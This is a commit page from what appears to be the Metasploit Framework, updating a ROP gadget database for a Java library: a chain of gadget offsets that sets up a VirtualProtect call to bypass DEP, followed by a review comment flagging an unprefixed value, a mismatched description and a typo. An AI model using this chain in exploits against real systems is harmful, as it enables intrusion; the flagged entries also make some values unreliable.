
Commit a9e51e3

author
jvazquez-r7
committed
Merge branch 'java_rop_update' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-java_rop_update
2 parents 6618c09 + be9d4ec commit a9e51e3


1 file changed

+20
-14
lines changed


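--- a/data/ropdb/java.xml
+++ b/data/ropdb/java.xml
@@ -6,22 +6,28 @@
 </compatibility>
 
 <gadgets base="0x7c340000">
-<gadget offset="0x0000252c">POP EBP # RETN</gadget>
-<gadget offset="0x0000252c">skip 4 bytes</gadget>
-<gadget offset="0x0002c55a">POP EBX # RETN</gadget>
-<gadget value="0x00000400">0x00000400-> ebx</gadget>
-<gadget offset="0x00005249">POP EDX # RETN</gadget>
-<gadget value="0x00000040">0x00000040-> edx</gadget>
-<gadget offset="0x000011c0">POP ECX # RETN</gadget>
-<gadget offset="0x00051897">Writable location</gadget>
-<gadget offset="0x0000b8d7">POP EDI # RETN</gadget>
-<gadget offset="0x00006c0b">RETN (ROP NOP)</gadget>
-<gadget offset="0x00026fa6">POP ESI # RETN</gadget>
+<gadget offset="0x00024c66">POP EBP # RETN</gadget>
+<gadget offset="0x00024c66">skip 4 bytes</gadget>
+<gadget offset="0x00004edc">POP EAX # RETN</gadget>
+<gadget value="FFFFFBFF">0x00000201</gadget>
+<gadget offset="0x00011e05">NEG EAX # RETN</gadget>
+<gadget offset="0x000136e3">POP EBX # RETN</gadget>
+<gadget value="0xffffffff"></gadget>
+<gadget offset="0x00005255">INC EBX # FPATAN # RETN</gadget>
+<gadget offset="0x0001218e">ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN</gadget>
+<gadget offset="0x00005937">POP EDX # RETN</gadget>
+<gadget value="0xffffffc0">0x00000040</gadget>
+<gadget offset="0x00011eb1">NEG EDX # RETN</gadget>
+<gadget offset="0x0002c5b9">POP ECX # RETN</gadget>
+<gadget offset="0x00051e67">Writable location</gadget>
+<gadget offset="0x00002e58">POP EDI # RETN</gadget>
+<gadget offset="0x0000d202">RETN (ROP NOP)</gadget>
+<gadget offset="0x0000f8f4">POP ESI # RETN</gadget>
 <gadget offset="0x000015a2">JMP [EAX]</gadget>
-<gadget offset="0x000362fb">POP EAX # RETN</gadget>
+<gadget offset="0x00004edc">POP EAX # RETN</gadget>
 <gadget offset="0x0003a151">ptr to VirtualProtect()</gadget>
-<gadget offset="0x00038c81">PUSHAD # ADD AL,0EF # RETN</gadget>
-<gadget offset="0x00005c30">ptr to 'push esp # ret</gadget>
+<gadget offset="0x00038c81">,PUSHAD # ADD AL,0EF # RETN</gadget>
+<gadget offset="0x00005c30">ptr to 'push esp # ret</gadget>
 </gadgets>
 </rop>
 </db>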
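Review bot: The added entry `<gadget value="FFFFFBFF">` (new line 12) is the only `value` or `offset` attribute in this section written without a `0x` prefix and in upper case. Whether it is read as hexadecimal depends on loader code not shown on this page, so `value="0xfffffbff"` would match the neighbouring `0xffffffff` and `0xffffffc0`. Its description `0x00000201` should be checked against the value, since the two's-complement negation of `0xfffffbff` is `0x00000401`. The description on new line 29 gained a leading comma (`,PUSHAD # ADD AL,0EF # RETN`), which looks like a typo. The `0xffffffff` entry on new line 15 has an empty description where the other constant entries say what the value is for.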
